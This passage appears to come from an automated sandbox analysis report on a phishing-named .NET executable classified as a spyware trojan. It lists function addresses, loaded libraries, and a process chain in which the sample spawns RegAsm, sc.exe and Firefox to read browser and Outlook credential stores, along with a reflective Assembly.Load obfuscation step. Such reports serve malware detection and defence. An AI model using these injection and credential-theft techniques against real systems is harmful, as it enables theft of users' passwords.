                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028CD8001_2_028CD800
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028F59101_2_028F5910
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028699501_2_02869950
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0287B9501_2_0287B950
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02869EB01_2_02869EB0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02861F921_2_02861F92
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0291FFB11_2_0291FFB1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02823FD21_2_02823FD2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02823FD51_2_02823FD5
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0291FF091_2_0291FF09
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0291FCF21_2_0291FCF2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028D9C321_2_028D9C32
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0287FDC01_2_0287FDC0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02863D401_2_02863D40
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02911D5A1_2_02911D5A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02917D731_2_02917D73
                Source: C:\Program Files (x86)\AUomrIcGckQctbQWdqxqsuxfByONsHfvVvkOjafMplh\ZrTbKDhAWYKJu.exeCode function: 5_2_028C40F85_2_028C40F8
                Source: C:\Program Files (x86)\AUomrIcGckQctbQWdqxqsuxfByONsHfvVvkOjafMplh\ZrTbKDhAWYKJu.exeCode function: 5_2_028C41045_2_028C4104
                Source: C:\Program Files (x86)\AUomrIcGckQctbQWdqxqsuxfByONsHfvVvkOjafMplh\ZrTbKDhAWYKJu.exeCode function: 5_2_028C41005_2_028C4100
                Source: C:\Program Files (x86)\AUomrIcGckQctbQWdqxqsuxfByONsHfvVvkOjafMplh\ZrTbKDhAWYKJu.exeCode function: 5_2_028CC7B45_2_028CC7B4
                Source: C:\Program Files (x86)\AUomrIcGckQctbQWdqxqsuxfByONsHfvVvkOjafMplh\ZrTbKDhAWYKJu.exeCode function: 5_2_028C3FB45_2_028C3FB4
                Source: C:\Program Files (x86)\AUomrIcGckQctbQWdqxqsuxfByONsHfvVvkOjafMplh\ZrTbKDhAWYKJu.exeCode function: 5_2_028C5FC45_2_028C5FC4
                Source: C:\Program Files (x86)\AUomrIcGckQctbQWdqxqsuxfByONsHfvVvkOjafMplh\ZrTbKDhAWYKJu.exeCode function: 5_2_028C5DA45_2_028C5DA4
                Source: C:\Program Files (x86)\AUomrIcGckQctbQWdqxqsuxfByONsHfvVvkOjafMplh\ZrTbKDhAWYKJu.exeCode function: 5_2_028E4D645_2_028E4D64
                Source: C:\Windows\SysWOW64\sc.exeCode function: 6_2_03A903E66_2_03A903E6
                Source: C:\Windows\SysWOW64\sc.exeCode function: 6_2_039DE3F06_2_039DE3F0
                Source: C:\Windows\SysWOW64\sc.exeCode function: 6_2_03A8A3526_2_03A8A352
                Source: C:\Windows\SysWOW64\sc.exeCode function: 6_2_03A502C06_2_03A502C0
                Source: C:\Windows\SysWOW64\sc.exeCode function: 6_2_03A702746_2_03A70274
                Source: C:\Windows\SysWOW64\sc.exeCode function: 6_2_03A901AA6_2_03A901AA
                Source: C:\Windows\SysWOW64\sc.exeCode function: 6_2_03A841A26_2_03A841A2
                Source: C:\Windows\SysWOW64\sc.exeCode function: 6_2_03A881CC6_2_03A881CC
                Source: C:\Windows\SysWOW64\sc.exeCode function: 6_2_039C01006_2_039C0100
                Source: C:\Windows\SysWOW64\sc.exeCode function: 6_2_03A6A1186_2_03A6A118
                Source: C:\Windows\SysWOW64\sc.exeCode function: 6_2_03A581586_2_03A58158
                Source: C:\Windows\SysWOW64\sc.exeCode function: 6_2_03A620006_2_03A62000
                Source: C:\Windows\SysWOW64\sc.exeCode function: 6_2_039CC7C06_2_039CC7C0
                Source: C:\Windows\SysWOW64\sc.exeCode function: 6_2_039F47506_2_039F4750
                Source: C:\Windows\SysWOW64\sc.exeCode function: 6_2_039D07706_2_039D0770
                Source: C:\Windows\SysWOW64\sc.exeCode function: 6_2_039EC6E06_2_039EC6E0
                Source: C:\Windows\SysWOW64\sc.exeCode function: 6_2_03A905916_2_03A90591
                Source: C:\Windows\SysWOW64\sc.exeCode function: 6_2_039D05356_2_039D0535
                Source: C:\Windows\SysWOW64\sc.exeCode function: 6_2_03A7E4F66_2_03A7E4F6
                Source: C:\Windows\SysWOW64\sc.exeCode function: 6_2_03A744206_2_03A74420
                Source: C:\Windows\SysWOW64\sc.exeCode function: 6_2_03A824466_2_03A82446
                Source: C:\Windows\SysWOW64\sc.exeCode function: 6_2_03A86BD76_2_03A86BD7
                Source: C:\Windows\SysWOW64\sc.exeCode function: 6_2_03A8AB406_2_03A8AB40
                Source: C:\Windows\SysWOW64\sc.exeCode function: 6_2_039CEA806_2_039CEA80
                Source: C:\Windows\SysWOW64\sc.exeCode function: 6_2_03A9A9A66_2_03A9A9A6
                Source: C:\Windows\SysWOW64\sc.exeCode function: 6_2_039D29A06_2_039D29A0
                Source: C:\Windows\SysWOW64\sc.exeCode function: 6_2_039E69626_2_039E6962
                Source: C:\Windows\SysWOW64\sc.exeCode function: 6_2_039B68B86_2_039B68B8
                Source: C:\Windows\SysWOW64\sc.exeCode function: 6_2_039FE8F06_2_039FE8F0
                Source: C:\Windows\SysWOW64\sc.exeCode function: 6_2_039DA8406_2_039DA840
                Source: C:\Windows\SysWOW64\sc.exeCode function: 6_2_039D28406_2_039D2840
                Source: C:\Windows\SysWOW64\sc.exeCode function: 6_2_03A4EFA06_2_03A4EFA0
                Source: C:\Windows\SysWOW64\sc.exeCode function: 6_2_039C2FC86_2_039C2FC8
                Source: C:\Windows\SysWOW64\sc.exeCode function: 6_2_03A12F286_2_03A12F28
                Source: C:\Windows\SysWOW64\sc.exeCode function: 6_2_03A72F306_2_03A72F30
                Source: C:\Windows\SysWOW64\sc.exeCode function: 6_2_039F0F306_2_039F0F30
                Source: C:\Windows\SysWOW64\sc.exeCode function: 6_2_03A44F406_2_03A44F40
                Source: C:\Windows\SysWOW64\sc.exeCode function: 6_2_039E2E906_2_039E2E90
                Source: C:\Windows\SysWOW64\sc.exeCode function: 6_2_03A8CE936_2_03A8CE93
                Source: C:\Windows\SysWOW64\sc.exeCode function: 6_2_03A8EEDB6_2_03A8EEDB
                Source: C:\Windows\SysWOW64\sc.exeCode function: 6_2_03A8EE266_2_03A8EE26
                Source: C:\Windows\SysWOW64\sc.exeCode function: 6_2_039D0E596_2_039D0E59
                Source: C:\Windows\SysWOW64\sc.exeCode function: 6_2_039E8DBF6_2_039E8DBF
                Source: C:\Windows\SysWOW64\sc.exeCode function: 6_2_039CADE06_2_039CADE0
                Source: C:\Windows\SysWOW64\sc.exeCode function: 6_2_039DAD006_2_039DAD00
                Source: C:\Windows\SysWOW64\sc.exeCode function: 6_2_03A6CD1F6_2_03A6CD1F
                Source: C:\Windows\SysWOW64\sc.exeCode function: 6_2_03A70CB56_2_03A70CB5
                Source: C:\Windows\SysWOW64\sc.exeCode function: 6_2_039C0CF26_2_039C0CF2
                Source: C:\Windows\SysWOW64\sc.exeCode function: 6_2_039D0C006_2_039D0C00
                Source: C:\Windows\SysWOW64\sc.exeCode function: 6_2_03A1739A6_2_03A1739A
                Source: C:\Windows\SysWOW64\sc.exeCode function: 6_2_03A8132D6_2_03A8132D
                Source: C:\Windows\SysWOW64\sc.exeCode function: 6_2_039BD34C6_2_039BD34C
                Source: C:\Windows\SysWOW64\sc.exeCode function: 6_2_039D52A06_2_039D52A0
                Source: C:\Windows\SysWOW64\sc.exeCode function: 6_2_03A712ED6_2_03A712ED
                Source: C:\Windows\SysWOW64\sc.exeCode function: 6_2_039EB2C06_2_039EB2C0
                Source: C:\Windows\SysWOW64\sc.exeCode function: 6_2_039ED2F06_2_039ED2F0
                Source: C:\Windows\SysWOW64\sc.exeCode function: 6_2_039DB1B06_2_039DB1B0
                Source: C:\Windows\SysWOW64\sc.exeCode function: 6_2_03A9B16B6_2_03A9B16B
                Source: C:\Windows\SysWOW64\sc.exeCode function: 6_2_03A0516C6_2_03A0516C
                Source: C:\Windows\SysWOW64\sc.exeCode function: 6_2_039BF1726_2_039BF172
                Source: C:\Windows\SysWOW64\sc.exeCode function: 6_2_03A870E96_2_03A870E9
                Source: C:\Windows\SysWOW64\sc.exeCode function: 6_2_03A8F0E06_2_03A8F0E0
                Source: C:\Windows\SysWOW64\sc.exeCode function: 6_2_039D70C06_2_039D70C0
                Source: C:\Windows\SysWOW64\sc.exeCode function: 6_2_03A7F0CC6_2_03A7F0CC
                Source: C:\Windows\SysWOW64\sc.exeCode function: 6_2_03A8F7B06_2_03A8F7B0
                Source: C:\Windows\SysWOW64\sc.exeCode function: 6_2_03A816CC6_2_03A816CC
                Source: C:\Windows\SysWOW64\sc.exeCode function: 6_2_03A156306_2_03A15630
                Source: C:\Windows\SysWOW64\sc.exeCode function: 6_2_03A6D5B06_2_03A6D5B0
                Source: C:\Windows\SysWOW64\sc.exeCode function: 6_2_03A995C36_2_03A995C3
                Source: C:\Windows\SysWOW64\sc.exeCode function: 6_2_03A875716_2_03A87571
                Source: C:\Windows\SysWOW64\sc.exeCode function: 6_2_03A8F43F6_2_03A8F43F
                Source: C:\Windows\SysWOW64\sc.exeCode function: 6_2_039C14606_2_039C1460
                Source: C:\Windows\SysWOW64\sc.exeCode function: 6_2_039EFB806_2_039EFB80
                Source: C:\Windows\SysWOW64\sc.exeCode function: 6_2_03A45BF06_2_03A45BF0
                Source: C:\Windows\SysWOW64\sc.exeCode function: 6_2_03A0DBF96_2_03A0DBF9
                Source: C:\Windows\SysWOW64\sc.exeCode function: 6_2_03A8FB766_2_03A8FB76
                Source: C:\Windows\SysWOW64\sc.exeCode function: 6_2_03A15AA06_2_03A15AA0
                Source: C:\Windows\SysWOW64\sc.exeCode function: 6_2_03A71AA36_2_03A71AA3
                Source: C:\Windows\SysWOW64\sc.exeCode function: 6_2_03A6DAAC6_2_03A6DAAC
                Source: C:\Windows\SysWOW64\sc.exeCode function: 6_2_03A7DAC66_2_03A7DAC6
                Source: C:\Windows\SysWOW64\sc.exeCode function: 6_2_03A43A6C6_2_03A43A6C
                Source: C:\Windows\SysWOW64\sc.exeCode function: 6_2_03A8FA496_2_03A8FA49
                Source: C:\Windows\SysWOW64\sc.exeCode function: 6_2_03A87A466_2_03A87A46
                Source: C:\Windows\SysWOW64\sc.exeCode function: 6_2_03A659106_2_03A65910
                Source: C:\Windows\SysWOW64\sc.exeCode function: 6_2_039D99506_2_039D9950
                Source: C:\Windows\SysWOW64\sc.exeCode function: 6_2_039EB9506_2_039EB950
                Source: C:\Windows\SysWOW64\sc.exeCode function: 6_2_039D38E06_2_039D38E0
                Source: C:\Windows\SysWOW64\sc.exeCode function: 6_2_03A3D8006_2_03A3D800
                Source: C:\Windows\SysWOW64\sc.exeCode function: 6_2_039D1F926_2_039D1F92
                Source: C:\Windows\SysWOW64\sc.exeCode function: 6_2_03A8FFB16_2_03A8FFB1
                Source: C:\Windows\SysWOW64\sc.exeCode function: 6_2_03993FD26_2_03993FD2
                Source: C:\Windows\SysWOW64\sc.exeCode function: 6_2_03993FD56_2_03993FD5
                Source: C:\Windows\SysWOW64\sc.exeCode function: 6_2_03A8FF096_2_03A8FF09
                Source: C:\Windows\SysWOW64\sc.exeCode function: 6_2_039D9EB06_2_039D9EB0
                Source: C:\Windows\SysWOW64\sc.exeCode function: 6_2_039EFDC06_2_039EFDC0
                Source: C:\Windows\SysWOW64\sc.exeCode function: 6_2_03A87D736_2_03A87D73
                Source: C:\Windows\SysWOW64\sc.exeCode function: 6_2_039D3D406_2_039D3D40
                Source: C:\Windows\SysWOW64\sc.exeCode function: 6_2_03A81D5A6_2_03A81D5A
                Source: C:\Windows\SysWOW64\sc.exeCode function: 6_2_03A8FCF26_2_03A8FCF2
                Source: C:\Windows\SysWOW64\sc.exeCode function: 6_2_03A49C326_2_03A49C32
                Source: C:\Windows\SysWOW64\sc.exeCode function: 6_2_02F221106_2_02F22110
                Source: C:\Windows\SysWOW64\sc.exeCode function: 6_2_02F1CFC06_2_02F1CFC0
                Source: C:\Windows\SysWOW64\sc.exeCode function: 6_2_02F1B3206_2_02F1B320
                Source: C:\Windows\SysWOW64\sc.exeCode function: 6_2_02F1B3146_2_02F1B314
                Source: C:\Windows\SysWOW64\sc.exeCode function: 6_2_02F1B31C6_2_02F1B31C
                Source: C:\Windows\SysWOW64\sc.exeCode function: 6_2_02F1D1E06_2_02F1D1E0
                Source: C:\Windows\SysWOW64\sc.exeCode function: 6_2_02F1B1D06_2_02F1B1D0
                Source: C:\Windows\SysWOW64\sc.exeCode function: 6_2_02F257D06_2_02F257D0
                Source: C:\Windows\SysWOW64\sc.exeCode function: 6_2_02F239D06_2_02F239D0
                Source: C:\Windows\SysWOW64\sc.exeCode function: 6_2_02F3BF806_2_02F3BF80
                Source: C:\Windows\SysWOW64\sc.exeCode function: 6_2_0372E5636_2_0372E563
                Source: C:\Windows\SysWOW64\sc.exeCode function: 6_2_0372E4486_2_0372E448
                Source: C:\Windows\SysWOW64\sc.exeCode function: 6_2_037354D46_2_037354D4
                Source: C:\Windows\SysWOW64\sc.exeCode function: 6_2_0372D9C86_2_0372D9C8
                Source: C:\Windows\SysWOW64\sc.exeCode function: 6_2_0372E8FD6_2_0372E8FD
                Source: C:\Windows\SysWOW64\sc.exeCode function: 6_2_0372CC736_2_0372CC73
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 02895130 appears 58 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 028CEA12 appears 86 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 028DF290 appears 103 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 028A7E54 appears 107 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 0284B970 appears 262 times
                Source: C:\Windows\SysWOW64\sc.exeCode function: String function: 03A17E54 appears 107 times
                Source: C:\Windows\SysWOW64\sc.exeCode function: String function: 03A3EA12 appears 86 times
                Source: C:\Windows\SysWOW64\sc.exeCode function: String function: 039BB970 appears 262 times
                Source: C:\Windows\SysWOW64\sc.exeCode function: String function: 03A4F290 appears 103 times
                Source: C:\Windows\SysWOW64\sc.exeCode function: String function: 03A05130 appears 58 times
                Source: New Order - RCII900718_Contract Drafting.exe, 00000000.00000002.1721869696.00000000028B1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRIDE.dll* vs New Order - RCII900718_Contract Drafting.exe
                Source: New Order - RCII900718_Contract Drafting.exe, 00000000.00000002.1720676508.0000000000A7E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs New Order - RCII900718_Contract Drafting.exe
                Source: New Order - RCII900718_Contract Drafting.exe, 00000000.00000002.1721792816.0000000000FE0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameRIDE.dll* vs New Order - RCII900718_Contract Drafting.exe
                Source: New Order - RCII900718_Contract Drafting.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                Source: New Order - RCII900718_Contract Drafting.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: New Order - RCII900718_Contract Drafting.exe, c4f54486cecec56b3df70dc7d0b0173ae.csCryptographic APIs: 'TransformFinalBlock', 'TransformBlock'
                Source: New Order - RCII900718_Contract Drafting.exe, c68b42d019343789ff263031dfcd77c80.csBase64 encoded string: 'TmV3IE9yZGVyIC0gUkNJSTkwMDcxOF9Db250cmFjdCBEcmFmdGluZyQ='
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/2@5/4
                Source: C:\Users\user\Desktop\New Order - RCII900718_Contract Drafting.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\New Order - RCII900718_Contract Drafting.exe.logJump to behavior
                Source: C:\Users\user\Desktop\New Order - RCII900718_Contract Drafting.exeMutant created: NULL
                Source: C:\Windows\SysWOW64\sc.exeFile created: C:\Users\user\AppData\Local\Temp\04j58b6gJump to behavior
                Source: New Order - RCII900718_Contract Drafting.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: New Order - RCII900718_Contract Drafting.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                Source: C:\Users\user\Desktop\New Order - RCII900718_Contract Drafting.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: sc.exe, 00000006.00000003.2421499932.00000000032E9000.00000004.00000020.00020000.00000000.sdmp, sc.exe, 00000006.00000003.2421347533.00000000032C8000.00000004.00000020.00020000.00000000.sdmp, sc.exe, 00000006.00000002.2977665984.00000000032E9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: New Order - RCII900718_Contract Drafting.exeReversingLabs: Detection: 31%
                Source: New Order - RCII900718_Contract Drafting.exeVirustotal: Detection: 33%
                Source: unknownProcess created: C:\Users\user\Desktop\New Order - RCII900718_Contract Drafting.exe "C:\Users\user\Desktop\New Order - RCII900718_Contract Drafting.exe"
                Source: C:\Users\user\Desktop\New Order - RCII900718_Contract Drafting.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                Source: C:\Program Files (x86)\AUomrIcGckQctbQWdqxqsuxfByONsHfvVvkOjafMplh\ZrTbKDhAWYKJu.exeProcess created: C:\Windows\SysWOW64\sc.exe "C:\Windows\SysWOW64\sc.exe"
                Source: C:\Windows\SysWOW64\sc.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\New Order - RCII900718_Contract Drafting.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                Source: C:\Program Files (x86)\AUomrIcGckQctbQWdqxqsuxfByONsHfvVvkOjafMplh\ZrTbKDhAWYKJu.exeProcess created: C:\Windows\SysWOW64\sc.exe "C:\Windows\SysWOW64\sc.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\sc.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Users\user\Desktop\New Order - RCII900718_Contract Drafting.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\Desktop\New Order - RCII900718_Contract Drafting.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\New Order - RCII900718_Contract Drafting.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\New Order - RCII900718_Contract Drafting.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\New Order - RCII900718_Contract Drafting.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\New Order - RCII900718_Contract Drafting.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\New Order - RCII900718_Contract Drafting.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\New Order - RCII900718_Contract Drafting.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\New Order - RCII900718_Contract Drafting.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\New Order - RCII900718_Contract Drafting.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\New Order - RCII900718_Contract Drafting.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\New Order - RCII900718_Contract Drafting.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\New Order - RCII900718_Contract Drafting.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\New Order - RCII900718_Contract Drafting.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\New Order - RCII900718_Contract Drafting.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\New Order - RCII900718_Contract Drafting.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: aclayers.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dllJump to behavior
                Source: C:\Windows\SysWOW64\sc.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\sc.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\sc.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\sc.exeSection loaded: ieframe.dllJump to behavior
                Source: C:\Windows\SysWOW64\sc.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\sc.exeSection loaded: netapi32.dllJump to behavior
                Source: C:\Windows\SysWOW64\sc.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\sc.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\sc.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\SysWOW64\sc.exeSection loaded: wkscli.dllJump to behavior
                Source: C:\Windows\SysWOW64\sc.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\sc.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\sc.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\sc.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\sc.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\sc.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\sc.exeSection loaded: mlang.dllJump to behavior
                Source: C:\Windows\SysWOW64\sc.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\sc.exeSection loaded: winsqlite3.dllJump to behavior
                Source: C:\Windows\SysWOW64\sc.exeSection loaded: vaultcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\sc.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\sc.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\sc.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Program Files (x86)\AUomrIcGckQctbQWdqxqsuxfByONsHfvVvkOjafMplh\ZrTbKDhAWYKJu.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Program Files (x86)\AUomrIcGckQctbQWdqxqsuxfByONsHfvVvkOjafMplh\ZrTbKDhAWYKJu.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Program Files (x86)\AUomrIcGckQctbQWdqxqsuxfByONsHfvVvkOjafMplh\ZrTbKDhAWYKJu.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Program Files (x86)\AUomrIcGckQctbQWdqxqsuxfByONsHfvVvkOjafMplh\ZrTbKDhAWYKJu.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Program Files (x86)\AUomrIcGckQctbQWdqxqsuxfByONsHfvVvkOjafMplh\ZrTbKDhAWYKJu.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Program Files (x86)\AUomrIcGckQctbQWdqxqsuxfByONsHfvVvkOjafMplh\ZrTbKDhAWYKJu.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\Desktop\New Order - RCII900718_Contract Drafting.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Users\user\Desktop\New Order - RCII900718_Contract Drafting.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                Source: C:\Windows\SysWOW64\sc.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
                Source: New Order - RCII900718_Contract Drafting.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: New Order - RCII900718_Contract Drafting.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: RIDE.pdb source: New Order - RCII900718_Contract Drafting.exe, 00000000.00000002.1721869696.00000000028B1000.00000004.00000800.00020000.00000000.sdmp, New Order - RCII900718_Contract Drafting.exe, 00000000.00000002.1721792816.0000000000FE0000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: ZrTbKDhAWYKJu.exe, 00000005.00000000.2167494215.000000000054E000.00000002.00000001.01000000.00000007.sdmp, ZrTbKDhAWYKJu.exe, 00000007.00000002.2977812837.000000000054E000.00000002.00000001.01000000.00000007.sdmp
                Source: Binary string: wntdll.pdbUGP source: RegAsm.exe, 00000001.00000002.2240670631.0000000002820000.00000040.00001000.00020000.00000000.sdmp, sc.exe, 00000006.00000003.2242299628.00000000037EA000.00000004.00000020.00020000.00000000.sdmp, sc.exe, 00000006.00000003.2240309306.0000000003638000.00000004.00000020.00020000.00000000.sdmp, sc.exe, 00000006.00000002.2978912261.0000000003990000.00000040.00001000.00020000.00000000.sdmp, sc.exe, 00000006.00000002.2978912261.0000000003B2E000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: RegAsm.pdb source: sc.exe, 00000006.00000002.2977665984.000000000325E000.00000004.00000020.00020000.00000000.sdmp, sc.exe, 00000006.00000002.2979542481.0000000003FBC000.00000004.10000000.00040000.00000000.sdmp, ZrTbKDhAWYKJu.exe, 00000007.00000002.2978983691.000000000257C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2532705070.0000000029ECC000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: sc.pdbUGP source: ZrTbKDhAWYKJu.exe, 00000005.00000002.2978143078.0000000000997000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: RegAsm.exe, RegAsm.exe, 00000001.00000002.2240670631.0000000002820000.00000040.00001000.00020000.00000000.sdmp, sc.exe, sc.exe, 00000006.00000003.2242299628.00000000037EA000.00000004.00000020.00020000.00000000.sdmp, sc.exe, 00000006.00000003.2240309306.0000000003638000.00000004.00000020.00020000.00000000.sdmp, sc.exe, 00000006.00000002.2978912261.0000000003990000.00000040.00001000.00020000.00000000.sdmp, sc.exe, 00000006.00000002.2978912261.0000000003B2E000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: RegAsm.pdb4 source: sc.exe, 00000006.00000002.2977665984.000000000325E000.00000004.00000020.00020000.00000000.sdmp, sc.exe, 00000006.00000002.2979542481.0000000003FBC000.00000004.10000000.00040000.00000000.sdmp, ZrTbKDhAWYKJu.exe, 00000007.00000002.2978983691.000000000257C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2532705070.0000000029ECC000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: sc.pdb source: ZrTbKDhAWYKJu.exe, 00000005.00000002.2978143078.0000000000997000.00000004.00000020.00020000.00000000.sdmp

                Data Obfuscation

                barindex
                Source: New Order - RCII900718_Contract Drafting.exe, cf2a4bb06922f42bd89f0b891d1b61c46.cs.Net Code: cb48b1adfa9c2725169d7374c67d3f787 System.Reflection.Assembly.Load(byte[])
